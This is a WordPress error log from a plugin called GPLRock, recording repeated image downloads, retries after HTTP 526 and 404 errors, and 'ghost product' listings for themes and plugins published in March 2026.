UTC] GPLRock: Using pre-downloaded image for product gamipress-frontend-awards: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-055d8eb0.jpg [26-Mar-2026 18:04:05 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-frontend-awards [26-Mar-2026 18:04:06 UTC] GPLRock: Image downloaded successfully for product gamipress-coupons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee2bcb4a.jpg [26-Mar-2026 18:04:06 UTC] GPLRock: Using pre-downloaded image for product gamipress-coupons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee2bcb4a.jpg [26-Mar-2026 18:04:06 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-coupons [26-Mar-2026 18:04:06 UTC] GPLRock: Image download failed for product autoride-chauffeur-limousine-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:07 UTC] GPLRock: Image downloaded successfully for product gamipress-nominations (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00597bc6.jpg [26-Mar-2026 18:04:07 UTC] GPLRock: Using pre-downloaded image for product gamipress-nominations: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00597bc6.jpg [26-Mar-2026 18:04:07 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-nominations [26-Mar-2026 18:04:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autoride---chauffeur-limousine-booking-wordpress-theme-14992.webp for product autoride-chauffeur-limousine-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:08 UTC] GPLRock WARNING: Image download failed for product autoride-chauffeur-limousine-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autoride---chauffeur-limousine-booking-wordpress-theme-14992.webp [26-Mar-2026 18:04:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autoride-chauffeur-limousine-booking-wordpress-theme [26-Mar-2026 18:04:08 UTC] GPLRock: Image downloaded successfully for product gamipress-submissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9bf605d7.jpg [26-Mar-2026 18:04:08 UTC] GPLRock: Using pre-downloaded image for product gamipress-submissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9bf605d7.jpg [26-Mar-2026 18:04:08 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-submissions [26-Mar-2026 18:04:08 UTC] GPLRock: Image downloaded successfully for product gentech-it-solutions-startup-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53ed580d.webp [26-Mar-2026 18:04:08 UTC] GPLRock: Using pre-downloaded image for product gentech-it-solutions-startup-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53ed580d.webp [26-Mar-2026 18:04:08 UTC] GPLRock: Ghost product published with image - Product ID: gentech-it-solutions-startup-wordpress-theme [26-Mar-2026 18:04:08 UTC] GPLRock: Image downloaded successfully for product mental-care-therapy-counseling-psychologist-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-77ba1b47.webp [26-Mar-2026 18:04:08 UTC] GPLRock: Using pre-downloaded image for product mental-care-therapy-counseling-psychologist-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-77ba1b47.webp [26-Mar-2026 18:04:08 UTC] GPLRock: Ghost product published with image - Product ID: mental-care-therapy-counseling-psychologist-wordpress-theme [26-Mar-2026 18:04:09 UTC] GPLRock: Image download failed for product arf-architecture-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:11 UTC] GPLRock: Image download failed for product arf-architecture-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arf--architecture--interior-design-wordpress-theme-29078.webp for product arf-architecture-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:14 UTC] GPLRock: Image download failed for product arf-architecture-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:16 UTC] GPLRock: Image download failed for product arf-architecture-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arf--architecture--interior-design-wordpress-theme-29078.webp for product arf-architecture-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:18 UTC] GPLRock WARNING: Image download failed for product arf-architecture-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/arf--architecture--interior-design-wordpress-theme-29078.webp [26-Mar-2026 18:04:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arf-architecture-interior-design-wordpress-theme [26-Mar-2026 18:04:19 UTC] GPLRock: Image download failed for product autrics-car-services-and-auto-mechanic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:21 UTC] GPLRock: Image download failed for product autrics-car-services-and-auto-mechanic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autrics--car-services-and-auto-mechanic-wordpress-theme-29570.webp for product autrics-car-services-and-auto-mechanic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:24 UTC] GPLRock: Image download failed for product autrics-car-services-and-auto-mechanic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:26 UTC] GPLRock: Image download failed for product autrics-car-services-and-auto-mechanic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autrics--car-services-and-auto-mechanic-wordpress-theme-29570.webp for product autrics-car-services-and-auto-mechanic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:28 UTC] GPLRock WARNING: Image download failed for product autrics-car-services-and-auto-mechanic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autrics--car-services-and-auto-mechanic-wordpress-theme-29570.webp [26-Mar-2026 18:04:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autrics-car-services-and-auto-mechanic-wordpress-theme [26-Mar-2026 18:04:29 UTC] GPLRock: Image download failed for product arcik-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:31 UTC] GPLRock: Image download failed for product arcik-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arcik---architecture-wordpress-theme-14108.webp for product arcik-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:33 UTC] GPLRock: Image download failed for product arcik-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:35 UTC] GPLRock: Image download failed for product arcik-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arcik---architecture-wordpress-theme-14108.webp for product arcik-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:37 UTC] GPLRock WARNING: Image download failed for product arcik-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/arcik---architecture-wordpress-theme-14108.webp [26-Mar-2026 18:04:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arcik-architecture-wordpress-theme [26-Mar-2026 18:04:37 UTC] GPLRock: Image download failed for product wicky-wine-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:39 UTC] GPLRock: Image download failed for product wicky-wine-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wicky--wine-shop-woocommerce-wordpress-theme-9947.webp for product wicky-wine-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:42 UTC] GPLRock: Image download failed for product wicky-wine-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:44 UTC] GPLRock: Image download failed for product wicky-wine-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wicky--wine-shop-woocommerce-wordpress-theme-9947.webp for product wicky-wine-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:46 UTC] GPLRock WARNING: Image download failed for product wicky-wine-shop-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wicky--wine-shop-woocommerce-wordpress-theme-9947.webp [26-Mar-2026 18:04:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wicky-wine-shop-woocommerce-wordpress-theme [26-Mar-2026 18:04:46 UTC] GPLRock: Image download failed for product crafto-the-multipurpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:48 UTC] GPLRock: Image download failed for product crafto-the-multipurpose-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crafto---the-multipurpose-html5-template-23861.webp for product crafto-the-multipurpose-html5-template after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:50 UTC] GPLRock: Image download failed for product crafto-the-multipurpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:52 UTC] GPLRock: Image download failed for product crafto-the-multipurpose-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crafto---the-multipurpose-html5-template-23861.webp for product crafto-the-multipurpose-html5-template after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:54 UTC] GPLRock WARNING: Image download failed for product crafto-the-multipurpose-html5-template. URL: https://meldwp.com/wp-content/uploads/crafto---the-multipurpose-html5-template-23861.webp [26-Mar-2026 18:04:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crafto-the-multipurpose-html5-template [26-Mar-2026 18:04:55 UTC] GPLRock: Image download failed for product creativex-a-bold-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:57 UTC] GPLRock: Image download failed for product creativex-a-bold-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creativex---a-bold-portfolio-wordpress-theme-30011.webp for product creativex-a-bold-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:59 UTC] GPLRock: Image download failed for product creativex-a-bold-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:05:02 UTC] GPLRock: Image download failed for product creativex-a-bold-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:05:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creativex---a-bold-portfolio-wordpress-theme-30011.webp for product creativex-a-bold-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:05:04 UTC] GPLRock WARNING: Image download failed for product creativex-a-bold-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/creativex---a-bold-portfolio-wordpress-theme-30011.webp [26-Mar-2026 18:05:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: creativex-a-bold-portfolio-wordpress-theme [26-Mar-2026 18:05:04 UTC] GPLRock: Image download failed for product bryan-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:05:06 UTC] GPLRock: Image download failed for product bryan-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:05:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bryan---resume-wordpress-theme-20325.webp for product bryan-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:05:09 UTC] GPLRock: Image download failed for product bryan-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:05:11 UTC] GPLRock: Image download failed for product bryan-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:05:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bryan---resume-wordpress-theme-20325.webp for product bryan-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:05:13 UTC] GPLRock WARNING: Image download failed for product bryan-resume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bryan---resume-wordpress-theme-20325.webp [26-Mar-2026 18:05:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bryan-resume-wordpress-theme [27-Mar-2026 01:26:49 UTC] GPLRock: Image download failed for product woocommerce-local-delivery-shipping (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:26:51 UTC] GPLRock: Image download failed for product woocommerce-local-delivery-shipping (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:26:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-local-delivery-shipping-28832.webp for product woocommerce-local-delivery-shipping after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:26:53 UTC] GPLRock: Image download failed for product woocommerce-local-delivery-shipping (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:26:55 UTC] GPLRock: Image download failed for product woocommerce-local-delivery-shipping (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:26:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-local-delivery-shipping-28832.webp for product woocommerce-local-delivery-shipping after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:26:57 UTC] GPLRock WARNING: Image download failed for product woocommerce-local-delivery-shipping. URL: https://meldwp.com/wp-content/uploads/woocommerce-local-delivery-shipping-28832.webp [27-Mar-2026 01:26:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-local-delivery-shipping [27-Mar-2026 01:26:58 UTC] GPLRock: Image download failed for product elementor-animated-pricing-table-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:00 UTC] GPLRock: Image download failed for product elementor-animated-pricing-table-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor---animated-pricing-table-widget-27526.webp for product elementor-animated-pricing-table-widget after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:03 UTC] GPLRock: Image download failed for product elementor-animated-pricing-table-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:05 UTC] GPLRock: Image download failed for product elementor-animated-pricing-table-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor---animated-pricing-table-widget-27526.webp for product elementor-animated-pricing-table-widget after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:07 UTC] GPLRock WARNING: Image download failed for product elementor-animated-pricing-table-widget. URL: https://meldwp.com/wp-content/uploads/elementor---animated-pricing-table-widget-27526.webp [27-Mar-2026 01:27:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-animated-pricing-table-widget [27-Mar-2026 01:27:07 UTC] GPLRock: Image download failed for product woocommerce-image-zoom (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:09 UTC] GPLRock: Image download failed for product woocommerce-image-zoom (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-image-zoom-29194.webp for product woocommerce-image-zoom after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:12 UTC] GPLRock: Image download failed for product woocommerce-image-zoom (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:14 UTC] GPLRock: Image download failed for product woocommerce-image-zoom (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-image-zoom-29194.webp for product woocommerce-image-zoom after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:16 UTC] GPLRock WARNING: Image download failed for product woocommerce-image-zoom. URL: https://meldwp.com/wp-content/uploads/woocommerce-image-zoom-29194.webp [27-Mar-2026 01:27:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-image-zoom [27-Mar-2026 01:27:17 UTC] GPLRock: Image download failed for product sngine-the-ultimate-php-social-network-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:19 UTC] GPLRock: Image download failed for product sngine-the-ultimate-php-social-network-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sngine---the-ultimate-php-social-network-platform-26242.webp for product sngine-the-ultimate-php-social-network-platform after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:22 UTC] GPLRock: Image download failed for product sngine-the-ultimate-php-social-network-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:24 UTC] GPLRock: Image download failed for product sngine-the-ultimate-php-social-network-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sngine---the-ultimate-php-social-network-platform-26242.webp for product sngine-the-ultimate-php-social-network-platform after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:26 UTC] GPLRock WARNING: Image download failed for product sngine-the-ultimate-php-social-network-platform. URL: https://meldwp.com/wp-content/uploads/sngine---the-ultimate-php-social-network-platform-26242.webp [27-Mar-2026 01:27:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sngine-the-ultimate-php-social-network-platform [27-Mar-2026 01:27:26 UTC] GPLRock: Image download failed for product elementor-page-builder-addons-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:28 UTC] GPLRock: Image download failed for product elementor-page-builder-addons-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-page-builder-addons-bundle-23889.webp for product elementor-page-builder-addons-bundle after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:31 UTC] GPLRock: Image download failed for product elementor-page-builder-addons-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:33 UTC] GPLRock: Image download failed for product elementor-page-builder-addons-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-page-builder-addons-bundle-23889.webp for product elementor-page-builder-addons-bundle after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:35 UTC] GPLRock WARNING: Image download failed for product elementor-page-builder-addons-bundle. URL: https://meldwp.com/wp-content/uploads/elementor-page-builder-addons-bundle-23889.webp [27-Mar-2026 01:27:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-page-builder-addons-bundle [27-Mar-2026 01:27:35 UTC] GPLRock: Image download failed for product svg-donut-charts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:37 UTC] GPLRock: Image download failed for product svg-donut-charts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [27-Mar-2026 01:27:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/svg-donut-charts-11861.webp for product svg-donut-charts after 3 attempts. HTTP Code: 526, Error: [27-Mar-2026 01:27:39 UTC] GPLRock: Image download failed for product svg-donut-charts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:35 UTC] GPLRock: Image download failed for product arrowtic-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:37 UTC] GPLRock: Image download failed for product arrowtic-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:37 UTC] GPLRock: Image downloaded successfully for product instive-insurance-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59104d45.jpg [28-Mar-2026 01:37:38 UTC] GPLRock: Using pre-downloaded image for product instive-insurance-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59104d45.jpg [28-Mar-2026 01:37:38 UTC] GPLRock: Ghost product published with image - Product ID: instive-insurance-wordpress-theme [28-Mar-2026 01:37:39 UTC] GPLRock: Image downloaded successfully for product sportspress-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-02fd01b2.jpg [28-Mar-2026 01:37:39 UTC] GPLRock: Using pre-downloaded image for product sportspress-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-02fd01b2.jpg [28-Mar-2026 01:37:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arrowtic---digital-marketing-agency-wordpress-theme-25694.webp for product arrowtic-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:37:39 UTC] GPLRock: Ghost product published with image - Product ID: sportspress-pro-wordpress-plugin [28-Mar-2026 01:37:39 UTC] GPLRock: Image download failed for product arrowtic-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:40 UTC] GPLRock: Image downloaded successfully for product tijarah-digital-marketplace-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59597c01.jpg [28-Mar-2026 01:37:40 UTC] GPLRock: Using pre-downloaded image for product tijarah-digital-marketplace-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59597c01.jpg [28-Mar-2026 01:37:40 UTC] GPLRock: Ghost product published with image - Product ID: tijarah-digital-marketplace-woocommerce-theme [28-Mar-2026 01:37:41 UTC] GPLRock: Image download failed for product arrowtic-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:41 UTC] GPLRock: Image downloaded successfully for product woocommerce-deposits-partial-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c214e37.jpg [28-Mar-2026 01:37:41 UTC] GPLRock: Using pre-downloaded image for product woocommerce-deposits-partial-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c214e37.jpg [28-Mar-2026 01:37:41 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-deposits-partial-payments [28-Mar-2026 01:37:43 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-request-a-quote-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11a5b1b2.jpg [28-Mar-2026 01:37:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arrowtic---digital-marketing-agency-wordpress-theme-25694.webp for product arrowtic-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:37:43 UTC] GPLRock WARNING: Image download failed for product arrowtic-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/arrowtic---digital-marketing-agency-wordpress-theme-25694.webp [28-Mar-2026 01:37:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arrowtic-digital-marketing-agency-wordpress-theme [28-Mar-2026 01:37:43 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-request-a-quote-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11a5b1b2.jpg [28-Mar-2026 01:37:43 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-request-a-quote-premium [28-Mar-2026 01:37:43 UTC] GPLRock: Image download failed for product nadus-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:44 UTC] GPLRock: Image downloaded successfully for product download-monitor-downloading-page (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8de09bd.jpg [28-Mar-2026 01:37:44 UTC] GPLRock: Using pre-downloaded image for product download-monitor-downloading-page: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8de09bd.jpg [28-Mar-2026 01:37:45 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-downloading-page [28-Mar-2026 01:37:45 UTC] GPLRock: Image download failed for product nadus-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:46 UTC] GPLRock: Image downloaded successfully for product woofunnels-aero-checkout-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cede3963.jpg [28-Mar-2026 01:37:46 UTC] GPLRock: Using pre-downloaded image for product woofunnels-aero-checkout-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cede3963.jpg [28-Mar-2026 01:37:46 UTC] GPLRock: Ghost product published with image - Product ID: woofunnels-aero-checkout-for-woocommerce [28-Mar-2026 01:37:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nadus---creative-wordpress-theme-28617.webp for product nadus-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:37:48 UTC] GPLRock: Image download failed for product latepoint-appointment-booking-reservation-plugin-for-wordpress (attempt 1/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:37:48 UTC] GPLRock: Image download failed for product nadus-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:50 UTC] GPLRock: Image download failed for product nadus-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:51 UTC] GPLRock: Image download failed for product latepoint-appointment-booking-reservation-plugin-for-wordpress (attempt 2/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:37:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nadus---creative-wordpress-theme-28617.webp for product nadus-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:37:53 UTC] GPLRock WARNING: Image download failed for product nadus-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nadus---creative-wordpress-theme-28617.webp [28-Mar-2026 01:37:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nadus-creative-wordpress-theme [28-Mar-2026 01:37:53 UTC] GPLRock: Image download failed for product stoni-architecture-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:54 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/LatePoint-Appointment-Booking-Reservation-plugin-for-WordPress.jpg for product latepoint-appointment-booking-reservation-plugin-for-wordpress after 3 attempts. HTTP Code: 404, Error: [28-Mar-2026 01:37:55 UTC] GPLRock: Image download failed for product stoni-architecture-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:56 UTC] GPLRock: Image download failed for product latepoint-appointment-booking-reservation-plugin-for-wordpress (attempt 1/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:37:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stoni---architecture-agency-wordpress-theme-4636.webp for product stoni-architecture-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:37:57 UTC] GPLRock: Image download failed for product stoni-architecture-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:59 UTC] GPLRock: Image download failed for product 